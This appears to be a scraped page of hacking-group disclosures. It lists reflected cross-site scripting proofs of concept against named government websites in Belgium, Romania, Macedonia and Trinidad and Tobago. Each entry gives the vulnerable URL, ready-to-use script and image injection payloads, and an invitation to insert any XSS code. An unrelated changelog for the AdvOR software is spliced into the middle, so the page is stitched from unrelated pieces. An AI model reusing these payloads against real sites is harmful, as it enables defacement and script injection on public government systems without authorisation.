Ministry of Defence of Belgium - XSS
Vulnerable page: http://www.mil.be/def/search/index.aspPoC:
Kod
"><h1>XSS found by Team Elite</h1>
Kod
"><img src=http://te-home.net/images/logo.png>
You can include any XSS code in search box to reproduce the bug.
Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Ministry of Internal Affairs of Romania - XSS
Vulnerable page: http://www.mai.gov.ro/engleza/Home_eng/english.htm?searWords=PoC:
Kod
http://www.mai.gov.ro/engleza/Home_eng/english.htm?searWords=%22%3E%3Cscript%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2Fscript%3E
Kod
http://www.mai.gov.ro/engleza/Home_eng/english.htm?searWords=%22%3E%3Cimg+src%3Dhttp%3A%2F%2Fte-home.net%2Fimages%2Flogo.png%3E&Send.x=8&Send.y=11
You can either include any XSS code in search input box, or request any XSS code directly using GET method and searWords parameter.
Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
AdvOR 0.3.0.19a
Changes in 0.3.0.19a
- corrected: possible buffer overflow when setting a huge OS version string- corrected: when changing the default OS version, a buffer that was not allocated with tor_malloc() was freed with tor_free() (thanks to anonymous for reporting this problem on sf.net)
- corrected: a generated AS path included some extra nodes that were before the selected path in the AS tree from geoip_as.h
- the program that imports AS path definitions and generates the geoip_as.h file is now included in the source code archive (as2asm)
- the AS path tree was updated with latest AS path definitions from cidr-report.org; a few errors were corrected in the AS tree import algorithm
- geoip_c.h was updated with GeoIPCountryWhois.csv released on December 5th; there are 84715 IP ranges having 114 ranges in the fake "A1" country; 110 ranges were approximated to real countries
- updated language strings: 1248
File information: AdvOR 0.3.0.19a
The Administration for Security and Counterintelligence of Republic of Macedonia - XSS
Vulnerable page: http://www.mvr.gov.mk/DesktopDefault.aspxPoC:
Kod
http://www.mvr.gov.mk/DesktopDefault.aspx?tabindex=0&tabid=47&search="><script>alert(String.fromCharCode(88,83,83))</script>
Kod
http://www.mvr.gov.mk/DesktopDefault.aspx?tabindex=0&tabid=47&search="><img src=http://te-home.net/images/logo.png>
You can either include any XSS code in search input box, or request any XSS code directly using GET method and search parameter.
Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Government of Trinidad and Tobago - XSS
Vulnerable page: http://www.ttconnect.gov.tt/gortt/portal/ttconnect/GovTTSimpleSearchPoC:
Kod
http://www.ttconnect.gov.tt/gortt/portal/ttconnect/GovTTSimpleSearch?searchKeyword="><h1>XSS found by Team Elite</h1>
Kod
http://www.ttconnect.gov.tt/gortt/portal/ttconnect/GovTTSimpleSearch?searchKeyword="><img src=http://te-home.net/images/logo.png>
You can either include any XSS code in search input box, or request any XSS code directly using GET method and searchKeyword parameter.
Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.